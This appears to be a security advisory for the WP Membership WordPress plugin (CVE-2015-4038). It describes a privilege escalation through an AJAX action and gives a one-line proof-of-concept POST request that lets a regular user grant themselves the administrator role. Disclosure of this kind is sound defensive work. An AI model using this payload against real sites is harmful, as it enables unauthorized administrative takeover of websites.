WP Membership [Privilege Escalation]

WP Membership plugin for WordPress suffers from a Privilege Escalation vulnerability

Description

Any registered user can perform a privilege escalation through iv_membership_update_user_settings AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website.

PoC

Login as regular user
Sent a POST request to http://example.com/wp-admin/admin-ajax.php with data: action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator

WordPress Plugins Privilege Escalation

INFO

7 February 2016
Pan Vag
wpmembership.e-plugins.com
codecanyon.net
1.2.3
WordPress 4.2.2
CVE-2015-4038

TIMELINE

2015-05-19:
Vendor notified about the issue